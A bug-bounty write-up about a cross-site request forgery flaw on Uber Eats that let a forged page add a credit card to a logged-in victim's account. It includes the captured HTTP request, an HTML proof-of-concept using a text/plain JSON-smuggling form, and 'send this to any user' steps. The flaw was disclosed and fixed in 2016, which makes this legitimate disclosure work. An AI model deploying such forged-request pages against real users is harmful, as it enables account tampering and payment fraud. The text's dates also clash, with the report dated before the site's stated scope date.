Add Credit Card to Any Uber Account Through eats.uber.com (CSRF)

Hi All,

Company Info:
Uber Technologies Inc. is an American technology company headquartered in San Francisco, California, United States, operating in 633 cities worldwide. It develops, markets and operates the Uber car transportation and food delivery mobile apps. Uber drivers use their own cars, although drivers can also rent a car to drive with Uber.

Bug Category and Reference Links:
Cross-Site Request Forgery (CSRF)
Link: https://www.owasp.org/index.php/Top_10_2013-A8-Cross-Site_Request_Forgery_(CSRF)

Technical Details of the Bug:
CSRF takes advantage of the fact that most web apps allow attackers to predict all the details of a particular action.
Because browsers send credentials like session cookies automatically, an attacker can create a malicious web page that generates forged requests which the server cannot distinguish from legitimate ones. The defence is something the attacker cannot predict or forge: an unpredictable per-session token that the server actually checks, plus verification of the Origin/Referer headers, which the browser sets and a page cannot override.
Detection of CSRF flaws is fairly easy via penetration testing or code analysis.


Bug Description:
It was in September 2016 when eats.uber.com came in scope. Uber Eats is a delivery service which hadn't launched in India. Since I was from India, it was pretty hard to find issues because delivery options weren't there. Still, I tried to book an order by entering a US location, and the checkout page came up where credit card details were required. When I tried to add a credit card and intercepted the request, I noticed that the request was in JSON format and that Origin, Referer and CSRF-token headers were implemented for CSRF protection. I removed all the headers and the request was still working. So I created an HTML PoC to add credit card details to any Uber account, and it was working fine.


Vulnerable Request:
POST /rtapi/payment/v2/payment_profiles/ HTTP/1.1
Host: eats.uber.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
x-csrf-token: undefined
Content-Type: application/json
Origin: https://eats.uber.com
Referer: https://eats.uber.com/?latLng=25.938877%2C-80.12154859999998&location=Collins+Avenue%2C+Sunny+Isles+Beach%2C+FL%2C+United+States
Content-Length: 229
Cookie: [Cookies]
Connection: keep-alive

{"tokenType":"bank_card","tokenData":{"useCase":"personal","billingCountryIso2":"US","billingZip":"","braintree":{"cardNumber":"","cardCode":"","cardExpirationMonth":"","cardExpirationYear":""}}}

None of these headers (Origin, Referer, x-csrf-token) were validated on the server side. Note that even the legitimate request carried the literal string "undefined" in the x-csrf-token header, and the server accepted it.


HTML PoC:

<html>
  <body>
    <!-- enctype="text/plain" makes the browser send "name=value" as the raw request
         body with no escaping. The JSON is carried in the field name, and the "="
         plus the value land inside a throwaway "ignore_me" string, so the endpoint
         receives a body it parses as valid JSON. -->
    <form action="https://eats.uber.com/rtapi/payment/v2/payment_profiles" method="POST" enctype="text/plain">
      <input type="hidden" name='{"tokenType":"bank_card","tokenData":{"useCase":"personal","billingCountryIso2":"US","billingZip":"","braintree":{"cardNumber":"","cardCode":"","cardExpirationMonth":"","cardExpirationYear":""}}, "ignore_me":"' value='test"}'>
      <input type="submit">
    </form>
  </body>
</html>

Steps to reproduce:
1. Send this HTML page to any user who is logged in to Uber.
2. Once the user clicks the submit button, the new credit card is added to the user's account.




Timeline:
August 20th 2016: Report sent to the Uber Security Team through HackerOne.
August 22nd 2016: Report triaged by the team.
September 8th 2016: Issue resolved by the Uber team and confirmed.
September 13th 2016: $6,000 bounty awarded.
Note: The bounty was awarded based on a few more CSRF reports for the same site, which I also submitted, so this was a combined bounty for them.



I would like to thank the Uber Security team for fixing this serious issue.
Please feel free to comment if you have any questions regarding this issue.


Thanks !
Vijay Kumar
